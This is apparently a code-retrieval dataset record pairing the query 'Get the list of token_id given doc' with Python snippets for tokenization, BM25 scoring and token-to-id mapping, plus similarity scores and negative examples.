read_pickle(docs_norm_scores_dicts_path+\"/\"+filename)\n docs_scores_all_claims = dict(docs_scores_all_claims.items() + curr_dict.items()) #merge dicts\n save_pickle(all_claims_norms_scores_merged_dict+\"/docs_norm_scores_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f),docs_scores_all_claims)", "def tokenize_replace_pos(doc_list, language_code, replace_pos,\n core_num=multiprocessing.cpu_count()):\n param = [[d, language_code, replace_pos] for d in doc_list]\n pool = multiprocessing.Pool(core_num)\n return pool.map(_tokenize_replace_pos4map, param)", "def refine_tokens( self, tokens ):\n k = 1.75\n b = 0.75\n stop_words_file = \"stop_words.txt\"\n all_stopwords = list()\n refined_tokens_sources = dict()\n \n # collect all the stopwords\n with open( stop_words_file ) as file:\n lines = file.read()\n all_stopwords = lines.split( \"\\n\" )\n \n for source in tokens:\n refined_tokens = dict()\n files = dict()\n inverted_frequency = dict()\n file_id = -1\n total_file_length = 0\n for item in tokens[ source ]:\n file_id += 1\n file_tokens = tokens[ source ][ item ].split(\" \")\n if source in \"name_desc_edam_help\":\n file_tokens = utils._clean_tokens( file_tokens, all_stopwords )\n total_file_length += len( file_tokens )\n term_frequency = dict()\n for token in file_tokens:\n if token is not '':\n file_ids = list()\n if token not in inverted_frequency:\n file_ids.append( file_id )\n else:\n file_ids = inverted_frequency[ token ]\n if file_id not in file_ids:\n file_ids.append( file_id )\n inverted_frequency[ token ] = file_ids\n # for term frequency\n if token not in term_frequency:\n term_frequency[ token ] = 1\n else:\n term_frequency[ token ] += 1\n files[ item ] = term_frequency\n N = len( files )\n average_file_length = float( total_file_length ) / N\n # find BM25 score for each token of each tool. It helps to determine\n # how important each word is with respect to the tool and other tools\n for item in files:\n file_item = files[ item ]\n file_length = len( file_item )\n for token in file_item:\n tf = file_item[ token ]\n # normalize the term freq of token for each document\n tf = float( tf ) / file_length\n idf = np.log2( N / len( inverted_frequency[ token ] ) )\n alpha = ( 1 - b ) + ( float( b * file_length ) / average_file_length )\n tf_star = tf * float( ( k + 1 ) ) / ( k * alpha + tf )\n tf_idf = tf_star * idf\n file_item[ token ] = tf_idf\n # filter tokens based on the BM25 scores and stop words. Not all tokens are important\n for item in files:\n file_tokens = files[ item ]\n tokens_scores = [ ( token, score ) for ( token, score ) in file_tokens.items() ]\n sorted_tokens = sorted( tokens_scores, key=operator.itemgetter( 1 ), reverse=True )\n refined_tokens[ item ] = sorted_tokens\n tokens_file_name = 'tokens_' + source + '.txt'\n token_file_path = os.path.join( os.path.dirname( self.tools_data_path ) + '/' + tokens_file_name )\n with open( token_file_path, 'w' ) as file:\n file.write( json.dumps( refined_tokens ) )\n file.close()\n refined_tokens_sources[ source ] = refined_tokens\n return refined_tokens_sources", "def build_ngram_index(tokenized_documents, ngrams):\n dictionary = {}\n\n doc_ngrams = {}\n for doc in tokenized_documents:\n ngrams_freq = {}\n\n measures = nltk.collocations.BigramAssocMeasures()\n finder = BigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n \n measures = nltk.collocations.TrigramAssocMeasures()\n finder = TrigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n\n doc_ngrams[doc] = ngrams_freq\n\n for ngram in ngrams:\n dictionary[ngram] = [0]\n for doc in doc_ngrams:\n if ngram in doc_ngrams[doc]:\n dictionary[ngram][0] += doc_ngrams[doc][ngram]\n dictionary[ngram].append((doc, doc_ngrams[doc][ngram]))\n \n return dictionary" ]
[ "0.68998206", "0.67045903", "0.63965476", "0.6270014", "0.6202376", "0.61885744", "0.6151995", "0.60434496", "0.60377157", "0.59981596", "0.59295934", "0.58968425", "0.5878697", "0.5846581", "0.5829846", "0.57702076", "0.57415456", "0.5731184", "0.571159", "0.56422395", "0.56206626", "0.56158304", "0.56098443", "0.5605549", "0.56044024", "0.5601467", "0.5599388", "0.5561202", "0.5560279", "0.55516464", "0.5550332", "0.5547204", "0.5522102", "0.55220526", "0.5517955", "0.5516518", "0.5508086", "0.5503605", "0.5489143", "0.54866636", "0.54812765", "0.54798603", "0.546946", "0.5467494", "0.5464095", "0.546391", "0.54616797", "0.5448641", "0.544098", "0.54241973", "0.54238206", "0.5410954", "0.5390047", "0.5376325", "0.53683513", "0.5364197", "0.5351491", "0.53480136", "0.5343806", "0.534199", "0.53341246", "0.53310096", "0.53275794", "0.5322643", "0.5319898", "0.5317479", "0.52941674", "0.52871186", "0.5282909", "0.52801293", "0.52791196", "0.52791196", "0.5277453", "0.5261558", "0.52605224", "0.52593344", "0.5257611", "0.5256494", "0.52483225", "0.5246229", "0.52368593", "0.5230774", "0.52286446", "0.5224301", "0.522175", "0.52179825", "0.52160466", "0.5212943", "0.521123", "0.5209256", "0.52077514", "0.52023995", "0.5199851", "0.51880676", "0.5183054", "0.5163004", "0.51602674", "0.51461196", "0.5139358", "0.5132946" ]
0.6872754
1
Get the list of token_id given doc.
def doc2id(self, doc): if isinstance(doc, string_types): raise TypeError("doc2idx expects an array of unicode tokens on input, not a single string") doc = map(self.process_token, doc) return [self.token_to_id(token) for token in doc]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def doc2id(self, doc):\n doc = map(self.process_token, doc)\n return [self.token_to_id(token) for token in doc]", "def get_tokens(self, document):\n raise NotImplementedError()", "def doc2token(self, doc):\n return [self.word2idx[word] if self.word2idx.__contains__(word)\n else self.word2idx['UNK'] for word in doc]", "def get_doc_ids(self):\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT id FROM documents\")\n results = [r[0] for r in cursor.fetchall()]\n cursor.close()\n return results", "def get_doc_ids(self):\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT id FROM documents\")\n results = [r[0] for r in cursor.fetchall()]\n cursor.close()\n return results", "def id2doc(self, ids):\n return [self.id_to_token(idx) for idx in ids]", "def id2doc(self, ids):\n return [self.id_to_token(idx) for idx in ids]", "def get_ids(self) -> List[str]:", "def tokens(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenList)['tokens']", "def keys(self):\n return list(self.token2id.values())", "def get_ids(self,tokens, tokenizer, max_seq_length):\n token_ids = tokenizer.convert_tokens_to_ids(tokens,)\n input_ids = token_ids + [0] * (max_seq_length-len(token_ids))\n return input_ids", "def convert_ids_to_tokens(self, tok_ids):\n result = []\n for tok in tok_ids:\n word = self.itos(tok)\n result.append(word)\n return result", "def tok2idx_data(token2id, tok_data):\n idx_data = []\n for toks in tok_data:\n idx_lst = [\n token2id[tok] if tok in token2id else UNK_IDX for tok in toks]\n idx_data.append(idx_lst)\n return idx_data", "def convert_tokens_to_ids(self, tokens):\n ids = []\n for token in tokens:\n ids.append(self.vocab[token])\n if len(ids) > self.max_len:\n logger.warning('Token indices sequence length is longer than the specified maximum sequence length for this BERT model ({} > {}). Running this sequence through BERT will result in indexing errors'.format(len(ids), self.max_len))\n return ids", "def list_ids(token):\n\n init_tenant_context(token, db)\n\n data = []\n LOGGER.debug(f\" Fetching list with known devices\")\n for id in db.session.query(Device.id).all():\n data.append(id[0])\n return data", "def extarct_id_tf(docs):\n\n if len(docs) == 0:\n return []\n docs = docs.split(',')\n ret = []\n for doc in docs:\n doc = doc.split('|')\n # doc_id, tf\n ret.append((int(doc[0]), int(doc[1])))\n return ret", "def list_tokens(user):\n return AppSpecificAuthToken.select().where(AppSpecificAuthToken.user == user)", "def list(uid: int):\n\n return Token.list(uid)", "def convert_tokens_to_ids(self, tokens):\n ids = []\n if isinstance(tokens, str):\n if tokens in self.special_tokens:\n return self.special_tokens[tokens]\n else:\n return self.encoder.get(tokens, self.unk_id)\n for token in tokens:\n if token in self.special_tokens:\n ids.append(self.special_tokens[token])\n else:\n ids.append(self.encoder.get(token, self.unk_id))\n return ids", "def get_ids(self, text):\n\n tokens = [token.orth for token in self.tokenizer(text)]\n ids = []\n for token in tokens:\n try:\n id = self.vocab.vectors.key2row[token]\n except KeyError:\n id = self.oov_id\n\n ids.append(id)\n\n return ids", "def get_tokens(self) -> List[str]:\n return self.tokens", "def getReviewsWithToken(self, token):\n\n wordid = self.find_word_in_dictionary(token)\n # word is not in the dictionary\n if wordid == -1:\n print(\"Token is not in the dictionary\")\n return 0\n\n with open(self.doc_to_words_path, 'rb') as bin:\n tup = []\n while bin.tell() != os.fstat(bin.fileno()).st_size:\n # get wordid:\n docid_in_file = int.from_bytes(bin.read(4), 'big')\n # get frequency:\n frequency = int.from_bytes(bin.read(4), 'big')\n # count words:\n count = 0\n for i in range(frequency):\n wordid_in_file = int.from_bytes(bin.read(4), 'big')\n if wordid == wordid_in_file:\n count += 1\n tup.append(docid_in_file)\n tup.append(count)\n return tuple(tup)", "def decode_ids_to_tokens(self, tokens: List[int]) -> List[str]:\n token_list = self.tokenizer.ids_to_tokens(tokens)\n return token_list", "def _get_vocab_id_list(self, json_obj):\n return json_obj", "def get_ids(self, text):\n\n tokens = [token.orth for token in self.tokenizer(text)]\n ids = []\n for token in tokens:\n try:\n id = self._vocab.vectors.key2row[token]\n except KeyError:\n id = self.oov_id\n\n ids.append(id)\n\n return ids", "def get_document_tags(self, docid):\n return [(key, json.loads(value))\n for key, value\n in self.sql_session.query(Feature)\n .filter(Feature.document == docid)\n .values(Feature.key, Feature.value)]", "def get_token_list():\n token_list = []\n tokens_dir_path = os.path.join(BASE_DIR, TOKENS_DIR)\n for dir, dirs, files in os.walk(tokens_dir_path):\n for file_name in files:\n file = open(os.path.join(tokens_dir_path, file_name), 'r')\n token_list.append(file.read().strip())\n file.close()\n return token_list", "def convert_ids_to_tokens(self, ids):\n tokens = []\n for i in ids:\n tokens.append(self.ids_to_tokens[i])\n return tokens", "def _get_doc_ids(dir_id, docname):\n cur = conn.cursor(cursor_factory=pgx.RealDictCursor)\n querystring = ('select id, source_docid, target_docid from {} where dir_id = %s and docname = %s;'\n result = execute_query(querystring.format(TABLES[3])), (dir_id, docname))\n if result:\n return result['id'], result['source_docid'], result['target_docid']\n return None, None, None", "def get_extent_token_ids(self, **kwargs):\n token_span = self.get_extent_tokens(**kwargs)\n return [t.index for t in token_span]", "def docs2ids(self):\n self.docs = [ [self.vocab[word] for word in doc] for doc in self.docs]", "def get_doc_id_titles(self):\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT id, title FROM documents\")\n results = [(r[0], r[1]) for r in cursor.fetchall()]\n cursor.close()\n return results", "def tokenize(doc):\n\n # Calls NLTK function to tokenize the document. Broken into individual words, cleans out punctuation\n tokens = nltk.word_tokenize(doc)\n\n return tokens", "def get_ids(self, sentence):\n return [self.get_id(word) for word in sentence.strip().split(' ')]", "def get_ids(corpus):\n corpusids = []\n for chunk in corpus:\n for _id in chunk.keys():\n corpusids.append(_id)\n return corpusids", "def tokens():\n return ['access token', 'refresh token']", "def getTokens(self):\n list = []\n for i in range(self.startIdx, self.endIdx + 1):\n token = self.sentence[i]\n list.append(token)\n return list", "def get_tokens(self):\r\n return self.token_set", "def fetch_doc_tokens(self, document_level, find_query_mixin={}):\n if document_level != 'postwise':\n raise NotImplementedError('document_level:%s' % document_level)\n\n query = {'subreddit':self.subreddit, document_level:{'$exists':True}}\n query.update(find_query_mixin)\n\n for doc in self.posts_read.find(query):\n try:\n yield doc[document_level]['tokens']\n except KeyError:\n # XXX: this shouldn't happen...\n print 'woop, doc missing %s.tokens' % document_level", "def get_all_group_ids(token) -> list:\n ids=list()\n _dict = perform_request(app_config.ENDPOINT, token)\n while True:\n for obj in _dict[\"value\"]:\n ids.append(obj[\"id\"])\n if \"@odata.nextLink\" not in _dict:\n return ids\n _dict = perform_request(_dict[\"@odata.nextLink\"], token)", "def get_positions(token, docs):\n\n all_matches = [token]\n for doc in docs:\n matches = []\n if token in doc:\n indexes = [i for i, x in enumerate(doc) if x == token]\n matches += [docs.index(doc), len(indexes), indexes]\n if matches:\n all_matches.append(matches)\n return all_matches", "def docs(self, searcher, exclude_docs=None):\r\n\r\n try:\r\n return self.matcher(searcher, exclude_docs=exclude_docs).all_ids()\r\n except TermNotFound:\r\n return []", "def get_token_list(text):\n return text.split()", "def _token_to_id(self, sequence_tokens, token_map, char_map, ngram=0,\n token_ngram_map=None, max_char_sequence_length=-1,\n max_char_length_per_token=-1):\n token_id_list = []\n char_id_list = []\n char_in_token_id_list = []\n ngram_id_list = []\n for token in sequence_tokens:\n char_id = [char_map.get(x, self.VOCAB_UNKNOWN) for x in token]\n char_id_list.extend(char_id[0:max_char_sequence_length])\n char_in_token = [char_map.get(x, self.VOCAB_UNKNOWN)\n for x in token[0:max_char_length_per_token]]\n char_in_token_id_list.append(char_in_token)\n\n token_id_list.append(\n token_map.get(token, token_map[self.VOCAB_UNKNOWN]))\n if ngram > 1:\n for j in range(2, ngram + 1):\n ngram_id_list.extend(\n token_ngram_map[x] for x in\n [\"\".join(sequence_tokens[k:k + j]) for k in\n range(len(sequence_tokens) - j + 1)] if x in\n token_ngram_map)\n if not sequence_tokens:\n token_id_list.append(self.VOCAB_PADDING)\n char_id_list.append(self.VOCAB_PADDING)\n char_in_token_id_list.append([self.VOCAB_PADDING])\n if not ngram_id_list:\n ngram_id_list.append(token_ngram_map[self.VOCAB_PADDING])\n return token_id_list, char_id_list, char_in_token_id_list, ngram_id_list", "def queryByDocId(self, docId):\n\n table = self.__getTable()\n return (row['entity'] for row in table.query_2(\n docId__eq = docId,\n index = 'docIdIndex'))", "def print_doc_tokens(doc):\n tokens = []\n for token in doc:\n tokens.append([token.text, token.pos_, token.dep_, token.tag_])\n\n df = pd.DataFrame(tokens, columns=[\"text\", \"part-of-speech\", \"syntactic_dependency_relation\", \"tag\"])\n return df", "def get_token(self, bot_id):\n res = self.execute(TABELLE['bot']['select']['by_id'], (bot_id,))\n # print(res)\n return res", "def tokens(self):\n # type: () -> List[Token]\n return self._tokens", "def _list_tokens(self, user_id, tenant_id=None, trust_id=None,\n consumer_id=None):\n raise exception.NotImplemented() # pragma: no cover", "def map_tokens_to_ids(self, tokens: List[str], max_length: int = None):\n # truncate extra tokens and pad to `max_length`\n if max_length:\n tokens = tokens[:max_length]\n tokens = tokens + [self._pad_token]*(max_length-len(tokens))\n return [self.map_token_to_id(token) for token in tokens]", "def iter_docids(self):\n return iter(self.client.smembers(self.dbprefix + 'docs'))", "def _get_token_ids(self, tokens):\n token_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n pad_amount = self.max_seq_length - len(tokens)\n input_ids = token_ids + [0] * pad_amount\n return np.array(input_ids)", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def get_ids_logs(doc):\n\n doc['ids'] = []\n\n with open('/var/log/suricata/eve.json', 'r') as f:\n for line in f:\n #lets go ahead and deserialize the log and pull out sig field\n sig = json.loads(line)['alert']['signature']\n #blergh, too lazy to comment out of suricata, or change UA\n if sig != \"ET POLICY Python-urllib/ Suspicious User Agent\":\n doc['ids'].append(sig)\n\n #add a check for empty ids file and lets just remove the field\n if len(doc['ids']) == 0:\n doc.pop('ids')\n return doc\n\n return doc", "def ids(self):\n return (x[\"_id\"] for x in self.document._meta.collection.find(self.spec, fields = (\"_id\",)))", "def tokens(self):\n\t\tlabels_and_synonyms = list(itertools.chain.from_iterable(list(self.term_to_tokens.values())))\n\t\ttokens = set(list(itertools.chain.from_iterable([word_tokenize(x) for x in labels_and_synonyms])))\n\t\treturn(list(tokens))", "def _tokens_to_terms(self, tokens: Sequence[str]) -> List[int]:\n ret = []\n for t in tokens:\n term = self.stemmer(t)\n if term in self.term2id_dict:\n ret.append(self.term2id_dict[term])\n else:\n self.term2id_dict[term] = self.g_term_max_id\n self.id2term_dict[self.g_term_max_id] = term\n ret.append(self.g_term_max_id)\n self.g_term_max_id += 1\n return ret", "def tokens(self) -> list:\n if self._tokens is None:\n tokens_ = sorted(list(self.elements()))\n self._tokens = tokens_\n return self._tokens", "def get_gensim_dictionary(gensim_dictionary_model):\n return list(gensim_dictionary_model.token2id.keys())", "def map_ids_to_tokens(self, ids: List[int], filter_padding=True):\n tokens = [self.map_id_to_token(id) for id in ids]\n if filter_padding:\n tokens = [t for t in tokens if t != self._pad_token]\n return tokens", "def getTokens(self):\n # NOTE: seems to be used by the evitaNominalTrainer only\n tokenList = []\n for chunkOrToken in self.dtrs:\n if chunkOrToken.isToken():\n tokenList += [chunkOrToken]\n elif chunkOrToken.isChunk():\n tokenList += chunkOrToken.dtrs\n else:\n logger.warn(\"Sentence element that is not a chunk or token\")\n return tokenList", "def getIDs():", "def getTokens(self):\n return self.__token", "def convert_tokens_to_ids(self, tokens, max_len=None):\n if max_len is not None:\n token_length = len(tokens)\n if max_len < token_length:\n tokens = tokens[:max_len]\n else:\n for _ in range(max_len - token_length):\n tokens.append(self.pad_token())\n return [self.stoi(tok) for tok in tokens]", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def get_tokens(self):\r\n return TokenGroup.get_tokens(self._tu, self.extent)", "def find_auth_token(document_html):\n search_result = re.search(AUTH_TOKEN_REGEX, document_html)\n if search_result:\n return search_result.group('auth_token')", "def _get_docs_in_dir(dir_id):\n querystring = 'select docname from {} where dir_id = %s;'.format(TABLES[3])\n result = execute_query(querystring, (dir_id,))\n if result:\n return [x[0] for x in result]\n return []", "def sentence_tokenize(tokenizer, sent):\n tokens = tokenizer.EncodeAsIds(sent).tokenization\n return tokens", "def tokenLookup(instrument_df,symbol_list):\r\n token_list = []\r\n for symbol in symbol_list:\r\n token_list.append(int(instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]))\r\n return token_list", "def tokenLookup(instrument_df,symbol_list):\r\n token_list = []\r\n for symbol in symbol_list:\r\n token_list.append(int(instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]))\r\n return token_list", "def get_ids(cls, text):\n tokens = TokenizerContainer.TOKENIZER.tokenize(text)\n token_ids = TokenizerContainer.TOKENIZER.convert_tokens_to_ids(tokens)\n input_ids = token_ids + [0] * (cls.MAX_LEN-len(token_ids))\n return tokens, input_ids", "def get_token_names(self) -> List[str]:\n return list(self._tokens.keys())", "def sentence_to_token_ids(sentence, vocabulary):\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]", "def doc2idx(self, document, unknown_word_index=-1):\n if isinstance(document, string_types):\n raise TypeError(\"doc2idx expects an array of unicode tokens on input, not a single string\")\n\n document = [word if isinstance(word, unicode) else unicode(word, 'utf-8') for word in document]\n return [self.token2id.get(word, unknown_word_index) for word in document]", "def tokenize_text(document, nlp):\n\n return [token.text for token in nlp(document)]", "def tokens(self):\n return self.__tokens", "def __get_lucene_contents(self, doc_id, en_list):\n contents = [{'field_name': Lucene.FIELDNAME_ID, 'field_value': doc_id, 'field_type': Lucene.FIELDTYPE_ID}]\n for en_id in en_list:\n contents.append({'field_name': \"content\", 'field_value': en_id, 'field_type': Lucene.FIELDTYPE_ID_TV})\n return contents", "def list_revoked_tokens(self):\n raise exception.NotImplemented() # pragma: no cover", "def getidlist(data: str = None) -> List[IDProfiler]:\n boxids: str = getinput(directory=DIR) if data is None else data\n idlist: List[IDProfiler] = list(map(IDProfiler, boxids.split(\"\\n\")))\n return idlist", "def tokenLookup(instrument_df,symbol_list):\n token_list = []\n for symbol in symbol_list:\n token_list.append(int(instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]))\n return token_list", "def vectorize(tokens, vocab):\n ids = []\n for token in tokens:\n if token in vocab.tok2id:\n ids.append(vocab.tok2id[token])\n else:\n ids.append(vocab.tok2id[vocab.UNK])\n return ids", "def getTokens(self):\n self.__require_privilaged_access()\n with DBSession(self.__config_db) as session:\n user = self.getLoggedInUser()\n sessionTokens = session.query(Session) \\\n .filter(Session.user_name == user) \\\n .filter(Session.can_expire.is_(False)) \\\n .all()\n\n result = []\n for t in sessionTokens:\n result.append(SessionTokenData(\n t.token,\n t.description,\n str(t.last_access)))\n\n return result", "def get_annotation_list(\n self,\n project_id: int,\n doc_id: int\n ) -> requests.models.Response:\n return self.get(\n 'v1/projects/{project_id}/docs/{doc_id}/annotations'.format(\n project_id=project_id,\n doc_id=doc_id\n )\n )", "def idsFromDocumentation(filename):\n\tidsInOrder = []\n\tsegment = \"\"\n\twith open(filename) as f:\n\t\tfor l in f:\n\t\t\tif \"<h2\" in l:\n\t\t\t\tsegment = l.split(\">\")[1].split(\"<\")[0]\n\t\t\tif 'id=\"SCI_' in l:\n\t\t\t\tidFeature = l.split('\"')[1]\n\t\t\t\t#~ print(idFeature)\n\t\t\t\tidsInOrder.append([segment, idFeature])\n\treturn idsInOrder", "def get_token_id(self):\n return f\"{self.document_title}_{self.index}\"", "def gettoken(tool_id, user_id):\n oauth_tokens = {\n 'access_token': '',\n 'user': {\n 'id': user_id\n }\n }\n params = {\n 'user_id': user_id\n }\n tokenq = \"\"\"select\naccess_token, refresh_token, expires_at, token_type, expires_in, user_name\nfrom tokens\nwhere user_id = :user_id\norder by expires_at desc\n\"\"\"\n tconn = dbconnect(CONFIG[CONFIG['app']['dbserver']])\n tcurr = tconn.cursor()\n try:\n results = tcurr.execute(tokenq, params).fetchone()\n except cx_Oracle.DatabaseError as err:\n LOG.error(\"Database error in retrieving tokens: %s\", err)\n\n if tcurr.rowcount > 0:\n oauth_tokens = {\n 'access_token': results[0],\n 'refresh_token': results[1],\n 'expires_at': results[2],\n 'token_type': results[3],\n 'expires_in': results[4],\n 'user': {\n 'name': results[5],\n 'id': user_id\n }\n }\n else:\n LOG.error(\"no token found for \" + str(tool_id) + ', ' + user_id)\n tcurr.close()\n tconn.close()\n return oauth_tokens", "def tokenize_doc_simple(self, doc):\n\n tokens = [word.strip(string.punctuation) for word in doc.split()]\n # remove the empty string\n return [token for token in tokens if token]", "def tokenizer(self, doc, lemmatize=False):\n doc = unicode(doc, \"utf-8\")\n if lemmatize:\n return [w.lemma_ for w in self.parser(doc)]\n else:\n return [w.text for w in self.parser(doc)]", "def sequence_to_list_ids(sequence, vocab):\n pass", "def getTokens(username):\n tokens = users.find({\"Username\": username})[0][\"Tokens\"]\n return tokens", "def tokens(self):\r\n return self.iter_tokens(self._blob)", "def get_translated_ids(id):", "def get_read_tokens(mastertoken, config):\n mt_path = mastertoken['paths']['self']\n url = \"{}{}/read_tokens.json\".\\\n format(config['domain_base'], mt_path)\n\n try:\n resp = (api_call(url, 'get', config['debug']))\n tokens = resp.json()\n except ValueError as ex:\n abort(\"Unexpected response from packagecloud API: \"\n \"{}\".format(ex.message))\n\n return tokens['read_tokens']", "def documents(pmid_23982599, civic_aid6_document):\n return [pmid_23982599, civic_aid6_document]", "def sentence_to_token_ids(self,sentence, vocabulary,\n tokenizer=None, normalize_digits=True):\n if tokenizer:\n words = tokenizer(sentence)\n else:\n words = self.basic_tokenizer(sentence)\n\n if not normalize_digits:\n return [vocabulary.get(w, self.UNK_ID) for w in words]\n # Normalize digits by 0 before looking words up in the vocabulary.\n return [vocabulary.get(re.sub(PTBReader._DIGIT_RE, \" \", w), self.UNK_ID) for w in words]", "def docs_to_list(documents):\n \n texts = [] \n for doc in documents:\n texts.append(doc.split())\n print ((\"The collection of documents contains {} documents\").format(len(texts)))\n return texts", "def get_selected_elements(doc):\n try:\n # Revit 2016\n return [doc.GetElement(id)\n for id in __revit__.ActiveUIDocument.Selection.GetElementIds()]\n except:\n # old method\n return list(__revit__.ActiveUIDocument.Selection.Elements)" ]
[ "0.71084183", "0.6638949", "0.64065033", "0.6308615", "0.6308615", "0.6248695", "0.6248695", "0.616698", "0.61223453", "0.60448986", "0.6016193", "0.6015829", "0.6009144", "0.59384847", "0.5869318", "0.5861415", "0.5859866", "0.5852833", "0.58410364", "0.5834465", "0.5816366", "0.58008885", "0.58006424", "0.5793585", "0.5777246", "0.5777149", "0.5776924", "0.57598704", "0.5750446", "0.5728729", "0.57229066", "0.5673558", "0.5648633", "0.5647172", "0.5640797", "0.5634816", "0.5618087", "0.56151867", "0.5613221", "0.55854183", "0.5532098", "0.55294013", "0.5519083", "0.55122906", "0.5475321", "0.5472813", "0.54664356", "0.54651076", "0.5437001", "0.5432145", "0.54201746", "0.54098976", "0.5395683", "0.5386548", "0.5382212", "0.5367989", "0.5361271", "0.5351235", "0.53112555", "0.53073", "0.53048784", "0.53008157", "0.52842635", "0.52715623", "0.5267278", "0.5267278", "0.5267278", "0.5266966", "0.52251", "0.5224945", "0.52134204", "0.5205132", "0.5205132", "0.5191797", "0.51915705", "0.5190645", "0.51888317", "0.51795524", "0.5169762", "0.51609653", "0.51598483", "0.5158202", "0.51499367", "0.51421475", "0.5136696", "0.513505", "0.5134813", "0.5134546", "0.5126149", "0.5124109", "0.5122007", "0.5116739", "0.5111097", "0.5110712", "0.51106024", "0.510913", "0.51055485", "0.5094392", "0.5073104", "0.5069208" ]
0.6642477
1
Get the token list.
def id2doc(self, ids): return [self.id_to_token(idx) for idx in ids]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_tokens(self) -> List[str]:\n return self.tokens", "def tokens(self):\n # type: () -> List[Token]\n return self._tokens", "def tokens(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenList)['tokens']", "def get_tokens(self):\r\n return self.token_set", "def get_token_list():\n token_list = []\n tokens_dir_path = os.path.join(BASE_DIR, TOKENS_DIR)\n for dir, dirs, files in os.walk(tokens_dir_path):\n for file_name in files:\n file = open(os.path.join(tokens_dir_path, file_name), 'r')\n token_list.append(file.read().strip())\n file.close()\n return token_list", "def getTokens(self):\n return self.__token", "def tokens(self):\n return self.__tokens", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def tokens(self) -> list:\n if self._tokens is None:\n tokens_ = sorted(list(self.elements()))\n self._tokens = tokens_\n return self._tokens", "def getTokens(self):\n list = []\n for i in range(self.startIdx, self.endIdx + 1):\n token = self.sentence[i]\n list.append(token)\n return list", "def get_token_names(self) -> List[str]:\n return list(self._tokens.keys())", "def get_tokens(self):\r\n return TokenGroup.get_tokens(self._tu, self.extent)", "def get_Tokens(self):\n return self._output.get('Tokens', None)", "def get_token_list(text):\n return text.split()", "def tokens():\n return ['access token', 'refresh token']", "def all_tokens(self) -> List[Hashable]:\n return self._all_tokens", "def list(uid: int):\n\n return Token.list(uid)", "def list_tokens(self) -> str:\n\n return self._format_symbol_table_content(\"Tokens\", self._symbols.keys())", "def get_tokens(self):\n def _traverse_preorder(cursor, token_list): # There is a method called \"walk_preorder\" in Cursor class. Here we need to ignore some subtrees so we implement on our own.\n if cursor.location.file and cursor.location.file.name != self.filepath: # exclude \"#include <...>\"\n return\n if (cursor.kind, cursor.spelling) in exclude_types: # exclude node in 'exclude_types'\n return\n \n token_list.append(cursor)\n for child in cursor.get_children():\n _traverse_preorder(child, token_list)\n\n tokens = []\n _traverse_preorder(self.cursor, tokens)\n return tokens", "def getTokens(self):\n self.__require_privilaged_access()\n with DBSession(self.__config_db) as session:\n user = self.getLoggedInUser()\n sessionTokens = session.query(Session) \\\n .filter(Session.user_name == user) \\\n .filter(Session.can_expire.is_(False)) \\\n .all()\n\n result = []\n for t in sessionTokens:\n result.append(SessionTokenData(\n t.token,\n t.description,\n str(t.last_access)))\n\n return result", "def token_values(self):\n return self._token_values", "def getTokens(self):\n # NOTE: seems to be used by the evitaNominalTrainer only\n tokenList = []\n for chunkOrToken in self.dtrs:\n if chunkOrToken.isToken():\n tokenList += [chunkOrToken]\n elif chunkOrToken.isChunk():\n tokenList += chunkOrToken.dtrs\n else:\n logger.warn(\"Sentence element that is not a chunk or token\")\n return tokenList", "def tokens(self):\n tokens = []\n for index in range(len(self.sentrep)):\n tokens.append(self.sentrep.getWord(index).lexeme())\n return tokens", "def tokens(self):\r\n return self.iter_tokens(self._blob)", "def get_tokens(self, document):\n raise NotImplementedError()", "def get_tokens(self):\n\t\treturn self.get_starttokens() + self.get_endtokens()", "def tokens(self):\r\n return Tokens(self)", "def __repr__(self) -> str:\n return \"<Twilio.Oauth.V1.TokenList>\"", "def tokens(self):\n return self._sentrep.tokens()", "def get_tokens(self, *args, **kwargs) -> List[Token]:\n for text in args:\n for char in text:\n self.set_tokens(char)\n self.flush_temp()\n\n return self.tokens", "def tokens(self):\n\t\tlabels_and_synonyms = list(itertools.chain.from_iterable(list(self.term_to_tokens.values())))\n\t\ttokens = set(list(itertools.chain.from_iterable([word_tokenize(x) for x in labels_and_synonyms])))\n\t\treturn(list(tokens))", "def get_tokens():\n return (HDFS_SITE_KEY, NAMESERVICE_KEY, NN_HTTP_ADDRESS_KEY, DFS_POLICY_KEY,\n EXECUTABLE_SEARCH_PATHS, NN_HTTPS_ADDRESS_KEY, SMOKEUSER_KEY,\n KERBEROS_KEYTAB, KERBEROS_PRINCIPAL, SECURITY_ENABLED_KEY,\n METRICS_COLLECTOR_VIP_HOST_KEY, METRICS_COLLECTOR_VIP_PORT_KEY,\n METRICS_COLLECTOR_WEBAPP_ADDRESS_KEY, AMS_HTTP_POLICY)", "def bearer_tokens(self):\n return self._bearer_tokens", "def list_revoked_tokens(self):\n raise exception.NotImplemented() # pragma: no cover", "def special_tokens(self) -> List[Hashable]:\n return list(self._special_token_kv.values())", "def synth_tokens(self):\n if self.lliagraph:\n return self.lliagraph.synth_tokens.items()\n else:\n return []", "def getList(self):\n pass", "def get_token_types() -> List[type]:\n return ExtensionTokenTypes.__TOKEN_TYPES", "def getList(self):\n\treturn self.list", "def list_tokens(user):\n return AppSpecificAuthToken.select().where(AppSpecificAuthToken.user == user)", "def getToken(self):\n \n raise NotImplementedError", "def getList(self):", "def getList(self):", 